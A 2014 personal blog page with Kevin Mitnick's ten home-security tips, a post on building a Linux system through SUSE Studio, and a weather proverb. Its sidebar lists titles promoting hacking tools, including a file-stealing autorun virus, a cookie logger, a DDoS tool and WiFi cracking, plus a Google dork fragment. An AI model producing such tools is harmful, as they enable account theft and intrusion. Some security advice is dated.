Security Tips By World's Most Wanted Hacker Kevin Mitnick Kevin Mitnick came by his security expertise the hard way. In the 1990s, his electronic penetration of some of the biggest companies in the world made him a notorious tech boogieman, and ultimately landed him five years in prison. Now free and clear, Mitnick has reinvented himself as a computer security consultant and writer. He travels the world teaching organizations how to secure their information in a world of corporate spies and younger versions of himself. He took a break from his jet-setting to share some practical security tips. Clip them and stick them on your parents' refrigerator or your IT administrator's white board. Here is Top 10 list of steps you should take to protect your information and your computing resources from the bad boys and girls of cyberspace: • Back up everything! You are not invulnerable. Catastrophic data loss can happen to you -- one worm or Trojan is all it takes. • Choose passwords that are reasonably hard to guess -- don't just append a few numbers to a no-brainer. Always change default passwords. • Use an antivirus product like AVG or Norton, and set it to update daily. • Update your OS religiously and be vigilant in applying all security patches released by the software manufacturer. • Avoid hacker-bait apps like Internet Explorer and disable automatic scripting on your e-mail client. • Use encryption software like PGP (pretty good privacy) when sending sensitive e-mail. You can also use it to protect your entire hard drive. • Install a spyware detection app -- or even several. Programs that can be set to run frequently, like SpyCop, are ideal. • Use a personal firewall. Configure it to prevent other computers, networks and sites from connecting to you, and specify which programs are allowed to connect to the net automatically. • Disable any system services you're not using, especially apps that could give others remote access to your computer (like Remote Desktop, RealVNC and NetBIOS). • Secure your wireless networks. At home, enable WPA (Wi-Fi protected access) with a password of at least 20 characters. Configure your laptop to connect in Infrastructure mode only, and don't add networks unless they use WPA. Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.
How to build own Operating System.
3:36 AM
| Posted by
Unknown
|
How to build own Operating System.. ================================ You might be using Windows,LINUX or Mac Operating System from very long. Ever wondered how these Operating System are made ? Or Ever think of making own Operating System ?? The Operating System you are going to create online will be Linux Operating System. There is no technical skills required for creating an own Linux Operating System online. Linux is a kernel, which can be used to create Operating Systems. Operating System(s) created by using Linux kernel are called Linux Operating System(s). Example of Linux Operating Systems are Ubuntu and SUSE To create own Operating System you don’t need to be a computer master or a programmer, all you need is a website: SUSE Studio. Yes, you can create your own Operating System online from ---> www. susestudio .com www. susestudio .com Sign in with your account, have to select a base package and desktop environment, 32 bit or 64 bit and then have to customize it like Logo, Soft-wares etc. once you have created your Own Linux Operating System you have to click on build and have to download an ISO image. You can burn this ISO image in a CD/DVD and can use that CD/DVD to install your own Operating System, just like you do with Windows or Linux CD......
Circle around the moon, rain or snow soon
2:26 AM
| Posted by
Unknown
|
"Circle around the moon, rain or snow soon." 15+ Ways to Predict the Weather Without a Forecast http://www.wikihow.com/Predict-the-Weather-Without-a-Foreca…
Subscribe to:
Comments
(Atom)
Welcome to my Blog!
Bine ati venit pe blogul nostru.
Cand nu sunt pe blog calatorim!!!
When I'm not blogging, I'm traveling :-)
Email me atGuran
Search
Blogroll
© 2014 by Guran Cosmin.
You're welcome to link to this site or use a single image and brief description to link back to any post. Republishing posts in their entirety is prohibited without permission.
Pictures
Become a Fan
Find Us On Facebook
Contact Form
Video
720x90 AdSpace
Recent Videos
Movie
http://youtu.be/Yj0G5UdBJZw
guran. Powered by Blogger.
Wikipedia
Search results
Popular Posts
-
Tare !!!(guta mititel ) continuare
-
#unuro The Google Black Holes Code: inurl:"view.asp?page=" intext:"plymouth" >>Ok what this code does? So thi...
-
You can press these buttons on your keyboard to use Facebook faster. j , k — Scroll between News Feed stories p — Post a new status l — Li...
-
//// What is DNS ///// Did you know you could be connected to facebook.com – and see facebook.com in your web browser’s address bar – whil...
-
10 Free Keyloggers to monitor your Local PC or Laptop! Here is an exclusive list of top 10 free local keyloggers. However If you are plannin...
-
Your blog is your personal online diary which combines the text, images and other media, and links to other blogs, web p...
-
What is Role Of Cookie,types, uses, setting and Privacy Concerns About Cookies What is Role Of Cookie,types, uses, setting and Privacy Conce...
-
(5) KING OF HACKERS How to Lock Drive of Remote Windows 10/8/7 Victim PC https://www.youtube.com/watch?v=4CgNDXKXxVo Facebook fan page : htt...
-
What is a VPN and how does it work? A VPN or Virtual Private Network is a method used to add security and privacy to private and public ne...
-
(5) For Indians! Happy Diwali in Batch Style! :P ;)... - Legendary Hacking Learners For Indians! Happy Diwali in Batch Style! @echo off colo...
Followers
Contributors
Archive
-
▼
2014
(1156)
-
▼
December
(29)
- http://www.fakenamegenerator.com/
- FREE DOWNLOAD E-BOOKS
- http://youtu.be/pHJSEc3zU5E
- How To Trace Your Facebook Profile Visitors
- Steps to Unlock Android pattern lock:
- president to write a computer program
- Best Free Sites to find Any Softwares Serial Key 1...
- Make an Autorun Virus that Steals files as soon as...
- SQL
- AngryIPScanner is a very fast IP address
- CREATE A COOKIE LOGGER TO HACK ANY ACCOUNT
- How to convert Facebook Profile To a Facebook fan ...
- How to Change /Restore IMEI no on Android phones a...
- Retrieve Deleted Facebook Messages,
- HP DDOSER
- Penetrate setups first lesson:
- A hacker in tips 1-penetrating devices http://www....
- How To Hack Wifi Password with Android Hack wifi u...
- Ethical Hacking Course Part-10 Introductions to So...
- How to Easily Recover Deleted files from Windows P...
- How To Hide Media Files from Android Phone's Gallery
- In this post i will teach a simple trick or browse...
- Android Hacking tool Hack Code:
- Refer your friends to Goibibo app and earn 100 Rs ...
- How you Earn 50$ Daily from Url Shortning
- http://worldwideprogramers.blogspot.in/2014/10/how...
- Security Tips By World's Most Wanted Hacker Kevin
- How to build own Operating System.
- Circle around the moon, rain or snow soon
-
▼
December
(29)